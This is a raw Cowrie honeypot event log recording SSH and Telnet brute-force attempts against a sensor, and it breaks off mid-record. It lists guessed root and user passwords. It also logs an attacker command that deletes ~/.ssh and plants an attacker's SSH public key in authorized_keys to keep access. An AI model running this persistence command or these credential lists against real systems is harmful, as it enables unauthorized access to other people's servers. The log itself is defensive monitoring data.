{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:33.677789Z","src_ip":"212.227.235.229","session":"1c95c0654313"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:47:34.633548Z","src_ip":"212.227.235.229","session":"1c95c0654313"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:34.870577Z","src_ip":"212.227.235.229","session":"10e4c4136aa2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:34.875064Z","src_ip":"212.227.235.229","session":"1c95c0654313"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48258,"dst_ip":"1.2.3.4","dst_port":22,"session":"eaa9a91f2db5","protocol":"ssh","message":"New connection: 212.227.235.229:48258 (1.2.3.4:22) [session: eaa9a91f2db5]","sensor":"my-vps","timestamp":"2025-09-09T01:47:39.404542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:39.405491Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:39.712579Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1","message":"login attempt [root/huawei@1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:47:40.983322Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:47:41.613583Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:47:41.614256Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:47:41.615417Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:41.923742Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:47:42.644161Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:47:42.644827Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:47:42.954643Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:42.955560Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48888,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f7b615dff9","protocol":"ssh","message":"New connection: 212.227.235.229:48888 (1.2.3.4:22) [session: 95f7b615dff9]","sensor":"my-vps","timestamp":"2025-09-09T01:47:43.262088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:43.262828Z","src_ip":"212.227.235.229","session":"95f7b615dff9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:43.571091Z","src_ip":"212.227.235.229","session":"95f7b615dff9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35403,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b2c74a17420","protocol":"telnet","message":"New connection: 212.227.235.229:35403 (1.2.3.4:23) [session: 6b2c74a17420]","sensor":"my-vps","timestamp":"2025-09-09T01:47:44.097111Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:47:44.846865Z","src_ip":"212.227.235.229","session":"95f7b615dff9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:46.158701Z","src_ip":"212.227.235.229","session":"95f7b615dff9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48900,"dst_ip":"1.2.3.4","dst_port":22,"session":"9768b18323b0","protocol":"ssh","message":"New connection: 212.227.235.229:48900 (1.2.3.4:22) [session: 9768b18323b0]","sensor":"my-vps","timestamp":"2025-09-09T01:47:46.472321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:46.473069Z","src_ip":"212.227.235.229","session":"9768b18323b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:46.787601Z","src_ip":"212.227.235.229","session":"9768b18323b0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:47:48.088213Z","src_ip":"212.227.235.229","session":"9768b18323b0"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:48.403735Z","src_ip":"212.227.235.229","session":"eaa9a91f2db5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:48.404569Z","src_ip":"212.227.235.229","session":"9768b18323b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56926,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bda437866d3","protocol":"ssh","message":"New connection: 212.227.235.229:56926 (1.2.3.4:22) [session: 8bda437866d3]","sensor":"my-vps","timestamp":"2025-09-09T01:47:48.641344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:48.642199Z","src_ip":"212.227.235.229","session":"8bda437866d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:48.901003Z","src_ip":"212.227.235.229","session":"8bda437866d3"}
{"eventid":"cowrie.login.failed","username":"user1","password":"12345","message":"login attempt [user1/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:47:49.974213Z","src_ip":"212.227.235.229","session":"8bda437866d3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:51.235772Z","src_ip":"212.227.235.229","session":"8bda437866d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54733,"dst_ip":"1.2.3.4","dst_port":22,"session":"018cb97640f0","protocol":"ssh","message":"New connection: 212.227.235.229:54733 (1.2.3.4:22) [session: 018cb97640f0]","sensor":"my-vps","timestamp":"2025-09-09T01:47:55.520319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:55.521077Z","src_ip":"212.227.235.229","session":"018cb97640f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:55.756639Z","src_ip":"212.227.235.229","session":"018cb97640f0"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"P@ssword123","message":"login attempt [deploy/P@ssword123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:47:56.740809Z","src_ip":"212.227.235.229","session":"018cb97640f0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:47:57.978972Z","src_ip":"212.227.235.229","session":"018cb97640f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56088,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a39c4795a8a","protocol":"ssh","message":"New connection: 212.227.235.229:56088 (1.2.3.4:22) [session: 7a39c4795a8a]","sensor":"my-vps","timestamp":"2025-09-09T01:47:58.691977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:47:58.693260Z","src_ip":"212.227.235.229","session":"7a39c4795a8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:47:58.953845Z","src_ip":"212.227.235.229","session":"7a39c4795a8a"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T01:48:00.035515Z","src_ip":"212.227.235.229","session":"7a39c4795a8a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:48:01.299612Z","src_ip":"212.227.235.229","session":"7a39c4795a8a"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":34228,"dst_ip":"1.2.3.4","dst_port":23,"session":"c40afe44b4b6","protocol":"telnet","message":"New connection: 79.124.8.120:34228 (1.2.3.4:23) [session: c40afe44b4b6]","sensor":"my-vps","timestamp":"2025-09-09T01:48:02.871884Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:48:02.911274Z","src_ip":"79.124.8.120","session":"c40afe44b4b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:48:02.929176Z","src_ip":"79.124.8.120","session":"c40afe44b4b6"}
{"eventid":"cowrie.session.closed","duration":31.547743558883667,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:48:15.644789Z","src_ip":"212.227.235.229","session":"6b2c74a17420"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56036,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4f6c7421520","protocol":"ssh","message":"New connection: 212.227.235.229:56036 (1.2.3.4:22) [session: e4f6c7421520]","sensor":"my-vps","timestamp":"2025-09-09T01:48:20.318136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:48:20.318989Z","src_ip":"212.227.235.229","session":"e4f6c7421520"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:48:20.561250Z","src_ip":"212.227.235.229","session":"e4f6c7421520"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-09-09T01:48:21.576694Z","src_ip":"212.227.235.229","session":"e4f6c7421520"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:48:22.821936Z","src_ip":"212.227.235.229","session":"e4f6c7421520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47910,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c702fe3b612","protocol":"ssh","message":"New connection: 212.227.235.229:47910 (1.2.3.4:22) [session: 8c702fe3b612]","sensor":"my-vps","timestamp":"2025-09-09T01:48:37.429490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:48:37.431274Z","src_ip":"212.227.235.229","session":"8c702fe3b612"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecds